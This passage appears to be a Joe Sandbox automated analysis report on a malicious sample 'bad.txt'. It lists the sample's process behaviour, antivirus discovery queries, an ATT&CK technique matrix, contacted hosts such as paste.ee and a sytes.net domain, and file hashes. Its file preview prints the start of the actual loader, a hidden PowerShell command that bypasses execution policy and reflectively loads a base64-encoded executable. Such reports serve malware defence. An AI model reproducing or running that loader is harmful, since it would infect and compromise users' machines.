aaegbzaaaaoqezagaegaaaadaaaram8xaaakf2onnaaaaqowcyspbgccbxdibziaaaoodwaabhpiagcxyhdybziaaaoodwaabljsnacxwasham8xaaakf2myzayqogilhzoybb83kwifmfkqabmwawcbaaaabaaaesbxrqaakdmaaap+pwaabc0lhxdqlwaaasgyaaak0aqaaaiogaaacig0aaakkduaaaqapwaabh4/aaaeezyaaap+pwaabhi3aabwka0aaazvnwaacigoaaagciavnaaakdmaaaoooaaacn4qaaaebx4aaaogfigmaaagfig5aaakkgaaabmwawawaaaabaaaeqnvogaachfaf9yx2hfwjtqaaaekawywbzsaaaocggyoegaabhb+aswgczwaaap6kiyca4ebaaabayoaabmwbqbeaaaabqaaerannaaaaqowcwiabhysasgraaagjgcwnwohbid/fwaaajegczwaaap6ahosaaduf2rbhbfwf9ox1o00aaabkaeaacshegeoeqaabhb+aswgczwaaap6bhzzpqaacioaabmwcaawaaaabgaaeqiofqaabgogbz4aaaowfhcg/w8pabcucz8aaaowf
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\bad.txt VolumeInformation
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: Yara matchFile source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2427144968.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2424988500.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        Scheduled Task/Job
        211
        Process Injection
        11
        Masquerading
        1
        Input Capture
        2
        Security Software Discovery
        Remote Services1
        Input Capture
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        Scheduled Task/Job
        1
        Disable or Modify Tools
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job
        Logon Script (Windows)1
        DLL Side-Loading
        41
        Virtualization/Sandbox Evasion
        Security Account Manager41
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell
        Login HookLogin Hook211
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging2
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials23
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        199.232.214.172
        truefalse
          high
          paste.ee
          104.21.84.67
          truefalse
            high
            ydekmoviess.sytes.net
            193.34.212.115
            truefalse
              unknown
              pastebin.com
              104.20.3.235
              truefalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.20.3.235
                pastebin.comUnited States
                13335CLOUDFLARENETUSfalse
                193.34.212.115
                ydekmoviess.sytes.netPoland
                201814PL-SKYTECH-ASPLfalse
                199.232.214.172
                bg.microsoft.map.fastly.netUnited States
                54113FASTLYUSfalse
                184.28.90.27
                unknownUnited States
                16625AKAMAI-ASUSfalse
                104.21.84.67
                paste.eeUnited States
                13335CLOUDFLARENETUSfalse
                IP
                127.0.0.1
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1578479
                Start date and time:2024-12-19 19:40:07 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:bad.txt
                Detection:MAL
                Classification:mal96.troj.evad.winTXT@8/5@3/20
                Cookbook Comments:
                • Found application associated with file extension: .txt
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 199.232.214.172
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Timeout during stream target processing, analysis might miss dynamic analysis data
                • VT rate limit hit for: bad.txt
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:unknown
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.245596380966818
                Encrypted:false
                SSDEEP:
                MD5:D80D14A798045C9B16E8266C0C2DA9C5
                SHA1:E8D2B5DB8F944A2F3E17C131589D9EC198E415E9
                SHA-256:25D993878057578CBCB6D552FDD9732ECA729131FAE2B89EAC3B68D3742163F2
                SHA-512:69CC6CD11E0E578ABEE4ACADEED2C2AD994D0F08AD9BDD5EBF1790A9A5E6CF9E74D590F1CAA58590FF6BC9C705EA822BF9972E6F014B332D3AA98F6064CC4A56
                Malicious:false
                Reputation:unknown
                Preview:p...... ........W{ .ER..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):14744
                Entropy (8bit):5.490952547570959
                Encrypted:false
                SSDEEP:
                MD5:09A93F41BAD645C1C6E61E247F52B710
                SHA1:A947B6404AFA86C568CFEB62742E79D889D106D5
                SHA-256:602379EED62006FDDE07EA0B56D22BD1A36DFFE87335712E195317DABE186569
                SHA-512:3D89EA1724973B8D13155516D5226114E2129EE85F0EBB8350EB19FD3FB38FDA7107286B4F2B00EBECD552F63131DBD18827F124FB76F0C21AD9E77ED6C9521D
                Malicious:false
                Reputation:unknown
                Preview:@...e...........8...............................................H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.H..............@-....f.J.|.7h8..........Microsoft.Powershell.PSReadline.8.................C}...C....n..B".......Microsoft.CSharp@...............
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:unknown
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\notepad.exe
                File Type:ASCII text, with very long lines (20674), with no line terminators
                Category:dropped
                Size (bytes):20674
                Entropy (8bit):4.964417431027495
                Encrypted:false
                SSDEEP:
                MD5:D02C187310EADF963C0D57378B8595FC
                SHA1:C8C42BD1D0EEE9C27A7718B478492CA5835B04DD
                SHA-256:E312DFDDEB5BA9867345DE8A4926B449854FB3EA90355C0F4150BBCB49593852
                SHA-512:EB6EB7832445CFF815C029632A94CE3EF2C9CE240132A67D38B84B8939D2A8D15298067787E3036361E003B8374BF6A7E1A586D2BE319A8166926E466FAB00D7
                Malicious:true
                Reputation:unknown
                Preview:"powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAPZXmuwAAAAAAAAAAPAAIgALAjAAADgAAAACAAAAAAAAAAAAAAAgAAAAAABAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAXDoBAAIAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFYAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAAFA3AAAAIAAAADgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAAQAAAAAGAAAAACAAAAOgAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFAMQpAACYKwAAAQAAABAAAAZcVQAAuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAigXAAAKKq5+AQAABC0ecgEAAHDQAgAAAigYAAAKbxkAAApzGgAACoABAAAE
                File type:ASCII text, with very long lines (20674), with no line terminators
                Entropy (8bit):4.964417431027495
                TrID:
                  File name:bad.txt
                  File size:20'674 bytes
                  MD5:d02c187310eadf963c0d57378b8595fc
                  SHA1:c8c42bd1d0eee9c27a7718b478492ca5835b04dd
                  SHA256:e312dfddeb5ba9867345de8a4926b449854fb3ea90355c0f4150bbcb49593852
                  SHA512:eb6eb7832445cff815c029632a94ce3ef2c9ce240132a67d38b84b8939d2a8d15298067787e3036361e003b8374bf6a7e1a586d2be319a8166926e466fab00d7
                  SSDEEP:384:XY9BUTO36iwSf8uqkwpKW/bv8p4EEEBCN1mC5VVqHwy7d55YfwCAXOIpRD:gqOkG8uqkwpKW/bv8pVCzmSfmt74mbpx
                  TLSH:11923B33C142BED87EB61F84BC4424204CCC7AA7522855A8FECE08D67CE5524DF7A9B8
                  File Content Preview:"powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAn
                  Icon Hash:72eaa2aaa2a2a292